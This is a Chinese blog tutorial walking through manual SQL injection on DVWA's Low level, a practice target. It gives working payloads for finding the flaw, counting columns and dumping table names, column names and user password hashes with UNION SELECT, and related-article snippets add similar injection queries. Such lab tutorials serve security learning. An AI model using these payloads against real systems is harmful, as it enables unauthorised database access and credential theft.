DVWA sql注入-LOW

最新推荐文章于 2024-04-29 20:55:13 发布
最新推荐文章于 2024-04-29 20:55:13 发布
阅读量545 收藏 9
点赞数 1
分类专栏: DVWA sql注入 文章标签: web sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46616663/article/details/117200145
版权

1.判断是否存在sql注入漏洞

 

出现报错,说明存在sql注入漏洞,无论是字符型还是整形都会因为单引号个数不匹配而报错。

如果未报错则未必存在sql注入,有可能存在对输入内容的过滤,采用其他方法判断是否存在注入。

2.判断注入漏洞的类型

分为两种:

数字型和字符型。

这是数据库本身存储数据时赋予给数据的类型。

先判断是否为数字型:

输入1 and 1 = 1

 

页面运行正常

输入1 and 1 = 2

 

页面也运行正常

  • 分析:

如果查询语句为数字型的话,输入 1 and 1 = 1 时,查询语句为

select * from <表名> where id = 1 and 1=1

语法和判断逻辑均没有问题,正常运行

如果查询语句为数字型的话,输入 1 and 1 = 2 时,查询语句为

select * from <表名> where id = 1 and 1=2

语法没有问题,但是判断逻辑为假,返回错误,说明这个应该是字符型注入。

如果为字符型注入的话,查询语句为

select * from <表名> where id = '1 and 1 = 2'

这里面的and不再作为一个逻辑判断而是字符串的一部分,是对值为 '1 and 1 = 2'的进行查找,当然没有等于这个值的列所以不会有查找结果,但是在语法和逻辑上却没有错误。

进一步验证是否为字符型

输入:1' and '1' = '1

 

 

页面运行正常

输入:1' and '1' = '2 查询失败

  • 分析

当输入 1' and '1' = '1 时,执行的查询语句为

select * from <表名> where id = '1' and '1' = '1'

其中第一个1后面的单引号用于闭合查询语句最前面的单引号,最后一个1后面空出的位置则留给查询语句最后的单引号。

这句话没有语法错误,判断逻辑也正确。

select * from <表名> where id = '1' and '1' = '2'

但是这句话判断逻辑错误,返回错误。

3.猜解数据库

猜解并验证列数

输入 1'order by # (使用“#”符号来注释后面的单引号)

 

继续尝试,直到报错为止

 

 

数据库字段数为2

验证列数:

 

获取数据库信息

1'union select version(),@@version_compile_os#

 

version() 获取当前数据库版本

@@version_compile_os 获取当前操作系统

查询用户名和数据库名

1'union select database(),user()#

 

database()查询到数据库名

user()查询到用户名

爆表名

1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

 

或者:

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

 

爆出users中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 

获取字段中的user和password

1' union select user,password from users#

 

N03RR0R
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
DVWAsql注入(low)
m0_52923241的博客
03-12 503
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1621
DVWAsql注入漏洞-low
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析
最新发布
2401_84253132的博客
04-29 710
这样的话估计不能使用Error注入。结论:字段为2。
DVWA-sql注入漏洞详解
weixin_43939527的博客
10-29 2101
1、判断是否存在SQL注入DVWA安全级别为“Low” (1)判断是否存在漏洞 Id值输入为1,发现正常显示 Id值输入为1’,发现报错 判断存在sql注入漏洞 (2)判断是否存在数字型漏洞 输入1 and 1=1 显示正常 输入1 and 1=2,显示仍然正常 故,判断不存在数字型漏洞 (3)判断是否存在字符型漏洞 输入1’ and ‘1’=’1,正常显示 输入1’ and ‘1’=’2,没有显示结果 故判断,此处存在一个sql注入漏洞,并且是字符型的漏洞 2、判断数据表的列数 使用or
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 497
DVWA靶场SQL注入实战
DVWA sql注入(低中高)
m0_73581247的博客
04-08 403
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1126
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
dvwa靶场sql注入(low)
qq_14902381的博客
08-22 394
dvwa 靶场,sql注入(low)
DVWA(7)SQL注入(SQL Injection) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 382
今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的。
DVWASQL注入(LOW)
weixin_46831054的博客
02-17 3202
SQL注入流程 面对一个查询条件的web网页,我们需要做以下的事情 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.下载数据 这里我们用hackbar,方便我们操作。 http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit# 利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的 1.判断是否
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 1万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA靶场全关卡---SQL注入(low)
weixin_63294541的博客
03-17 319
目录1、找注入点2、盲猜字段3、回显显示4、找数据库5、获取数据库中的表6、查看表中的字段7、显示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1779
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
2401_84253132的博客
04-29 782
这样的话估计不能使用Error注入。结论:字段为2。
dvwa sql注入爆所有库名
12-12
以下是使用DVWA平台进行SQL注入爆所有库名的步骤: 1. 打开DVWA平台,选择SQL Injection(Low)级别。 2. 在输入框中输入单引号(')并提交,如果页面出现错误,则说明存在注入漏洞。 3. 在输入框中输入以下语句并提交,可以获取所有库名: ``` ' union select null, schema_name, null from information_schema.schemata # ``` 4. 页面会显示所有库名,复制其中一个库名。 5. 在输入框中输入以下语句并提交,可以获取该库下所有表名: ``` ' union select null, table_name, null from information_schema.tables where table_schema='库名' # ``` 其中,将“库名”替换为第3步中复制的库名。 6. 页面会显示该库下所有表名,复制其中一个表名。 7. 在输入框中输入以下语句并提交,可以获取该表下所有字段名: ``` ' union select null, column_name, null from information_schema.columns where table_name='表名' # ``` 其中,将“表名”替换为第6步中复制的表名。 8. 页面会显示该表下所有字段名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值